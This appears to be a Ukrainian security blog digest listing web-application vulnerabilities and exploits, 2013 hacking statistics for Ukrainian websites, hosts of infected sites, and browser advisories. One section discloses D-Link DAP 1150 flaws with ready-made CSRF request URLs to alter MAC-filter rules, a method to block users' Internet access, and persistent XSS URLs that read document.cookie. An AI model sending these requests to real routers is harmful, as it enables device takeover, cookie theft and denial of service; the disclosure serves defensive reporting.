Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Multiple vulnerabilities - Surveillance via Symantec Web Gateway (деталі)
• Cross-Site Scripting (XSS) in Jamroom (деталі)
• CSP MySQL User Manager v2.3 SQL Injection Authentication Bypass (деталі)
• Vulnerabilities in Apache Solr < 4.6.0 (деталі)
• Security Notice for CA Service Desk Manager (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Orange, Page Flip Image Gallery та DZS Video Gallery. Для котрих з’явилися експлоіти. Orange - це тема движка, Page Flip Image Gallery - це плагін для створення галереї зображень, DZS Video Gallery - це плагін для створення відео галереї.

• WordPress Orange Cross Site Request Forgery (деталі)
• WordPress Page Flip Image Gallery Shell Upload (деталі)
• WordPress DZS Video Gallery 3.1.3 Remote File Disclosure (деталі)

Стосовно DZS Video Gallery, то це не RFD, а Content Spoofing.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В своєму звіті Хакерська активність в Уанеті в 1 півріччі 2013 я навів дані про діяльність хакерів в Уанеті за період з 01.01.2013 по 30.06.2013, а в звіті Хакерська активність в Уанеті в 2 півріччі 2013 - дані за період з 01.07.2013 по 31.12.2013.

За весь 2013 рік в Уанеті було проведено 1100 атак на веб сайти - 724 за перше півріччя і 376 за друге. Для порівняння, за весь 2012 рік було зафіксовано всього 1142 атак на веб сайти. І це тільки виявлені мною випадки (і я ще не всі данні обробив), реальна кількість інцидентів може бути значно вищою.

Динаміка зростання хакерської активності за минулий рік: за перше півріччя 2013 активність більша на 7,4% в порівнянні з аналогічним періодом 2012 року, а за друге півріччя 2013 - на 20,7% менша за аналогічний період 2012 року. А в цілому в 2013 році активність впала на 3,7% порівняно з 2012 роком - спад в 1,04 рази.

В 2013 році загалом було атаковано 1100 веб ресурсів (як взломи, так і DDoS атаки), перелік яких ви можете знайти у відповідних звітах за перше і друге півріччя минулого року. А також були інфіковані 226 сайти, які вірогідно були похакані в 2013 році.

Головні тенденції 2013 року в діяльності хакерів в Уанеті:

• Хакерська активність дещо впала - на 3,7% порівняно з 2012 роком (зменшення динаміки у 1,04 рази).
• Багато сайтів в Уанеті заражуються вірусами: в 2012 я виявив 202 інфікованих сайтів, в 2013 - вже 226 сайтів (збільшення динаміки у 1,12 рази).
• Кількість DDoS атак на сайти менша ніж в 2012 році - 13 випадків DDoS атак за рік (зменшення у 3 рази). Це 1,2% від всіх атак за 2013 рік.
• Атаковано 149 державних сайтів та інфіковано ще 11 gov.ua-сайтів.
• Зменшення взломів державних сайтів в 1,15 рази та зменшення інфікування gov.ua-сайтів в 1,45 рази порівняно з 2012 роком.

Велика кількість заражених сайтів в Уанеті (в тому числі gov.ua-сайтів) свідчить про чималий відсоток кримінальних взломів сайтів.

Підсумовуючи скажу, що активність хакерів в минулому році була високою і вона продовжить такою бути. І в 2014 році ця тенденція збережеться.

В новому році очікуйте на нові звіти про хакерську активність в Уанеті.

Виявлені численні уразливості безпеки в cURL.

Уразливі версії: cURL 7.36.

Витік інформації, обхід перевірки сертифікатів.

• Vulnerabilities in curl (деталі)

В даній добірці експлоіти в веб додатках:

• Technicolor TC7200 - Credentials Disclosure Vulnerability (деталі)
• Private Camera Pro 5.0 iOS - Multiple Vulnerabilities (деталі)
• MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation (деталі)
• Pandora FMS Remote Code Execution Exploit (деталі)
• Kloxo SQL Injection / Remote Code Execution Exploit (деталі)

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

CSRF (WASC-09):

В розділі Firewall / MAC-filter через CSRF можна додавати, редагувати та видаляти налаштування MAC-фільтрів.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%221%22,%22enable%22:%22ACCEPT%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%221%22,%22enable%22:%22ACCEPT%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=74&res_struct_size=0&res_pos=0

DoS атака через CSRF:

Додавши відповідні MAC-фільтри, можна заблокувати користувачам доступ в Інтернет через даний роутер. Для цього в полі mac треба вказати MAC-адресу пристрою, а в полі enable - DROP.

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Firewall / MAC-filter.

Атака через функцію додавання в параметрі res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%22enable%22:%22ACCEPT%22}&res_pos=-1

Атака через функцію редагування в параметрі res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%22enable%22:%22ACCEPT%22}&res_pos=0

CSRF (WASC-09):

В розділі Firewall / Virtual servers через CSRF можна додавати, редагувати та видаляти віртуальні сервери.

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Firewall / Virtual servers. Атака відбувається через функції додавання та редагування в параметрі res_buf.

12.02.2014

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6, 7, 8, 9, 10, 11 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7, Windows 8, Windows 2012 Server, Windows 8.1.

Численні пошкодження пам’яті, підвищення привілеїв, міжсайтовий доступ до даних.

• Многочисленные уязвимости безопасности в Microsoft Internet Explorer (деталі)

12.04.2014

Додаткова інформація.

• MS14-010 CVE-2014-0293 Technical Details and Code (деталі)

В підсумках хакерської активності в Уанеті в 2 півріччі 2013 я зазначав, що всього за цей період я виявив 96 інфікованих сайтів в Уанеті. Дані сайти хостилися на серверах різних хостінг провайдерів, як українських, так і закордонних.

Пропоную вам звіт про результати мого дослідження хостінгів, які розміщували інфіковані сайти в другому півріччі 2013 року. Багато з цих хостінг провайдерів робили це і в першому півріччі. Щоб і хостери і Інтернет користувачі знали найбільших розповсюджувачів шкідливого програмного забезпечення (через інфіковані сайти).

В другому півріччі минулого року наступні хостінг провайдери розміщували на своїх серверах інфіковані сайти: 1GB LLC, Besthosting, Bizland, Colocall, Compubyte Limited, CrimeaInfocom, Datagroup, Delta-X, Digital Ventures, DMedia, Dream Line, eServer.ru, FastVPS, Goodnet, Golden Telecom, Hosting.ua, HostLife, Hetzner, Hvosting, ISPsystem, iWeb, Infocom, Internet Communications, Keyweb Online, KHRSA, Kyivstar, Langate, LeaseWeb, Mageal, Microsoft, MiroHost, NAU, Server.ua, PlusServer, Web-Com, Shantyr, TheHost, TW Telecom, UA Servers, UkrNet, Ukraine Host, VOLZ, Volia, Wnet, Укртелеком.

Найбільші інфіковані хостери (TOP-10):

• Datagroup - 13 сайтів
• Delta-X - 9 сайтів
• Besthosting - 9 сайтів
• Hetzner - 6 сайтів
• Compubyte Limited - 4 сайтів
• Wnet - 4 сайтів
• FastVPS - 3 сайтів
• Kyivstar - 3 сайтів
• Colocall - 3 сайтів
• Server.ua - 2 сайтів

Були виявлені хостінги всіх 96 сайтів. Хоча деякі з цих сайтів в даний момент вже не працювали (вони явно були закриті через розміщення malware на цих ресурсах), але за допомогою власної системи моніторингу я визначив хостерів під час виявлення цих інфікованих сайтів.

Виявлені численні уразливості безпеки в Apple Safari.

Уразливі версії: Apple Safari 6.1, Safari 7.0.

Численні пошкодження пам’яті, обхід обмежень.

• APPLE-SA-2014-04-01-1 Safari 6.1.3 and Safari 7.0.3 (деталі)

В даній добірці уразливості в веб додатках:

• HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Access, Execution of Arbitrary Code (деталі)
• Multiple Cross-Site Scripting (XSS) in Claroline (деталі)
• SQL Injection in Dokeos (деталі)
• SQL Injection in Chamilo LMS (деталі)
• HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access (деталі)